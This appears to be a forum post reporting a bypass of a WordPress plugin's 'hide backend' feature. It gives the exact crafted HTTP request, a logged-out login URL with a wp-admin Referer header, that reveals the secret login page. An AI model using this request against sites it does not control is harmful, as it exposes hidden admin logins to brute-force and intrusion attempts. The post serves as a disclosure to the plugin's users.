dr.yoni

The hide backend feature requires to change the default permalinks.
The setup page sats that: “In both cases it requires permalinks to be turned on in your settings to function.”

So it’s not the issue.

upgrading WordPress to the latest version (3.4.2) solved this problem for me.
But I’ve found a way to bypass it even in the latest wordpress version.

by sending a request to “https://YourDomainHere/wp-login.php?loggedout=true” with Referer of “https://YourDomainHere/wp-admin/” the website redirects you to the secret login page.

This is an HTTP packet sent to the server:

GET /wp-login.php?loggedout=true HTTP/1.1
Host: YourDomainHere
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: https://YourDomainHere/wp-admin/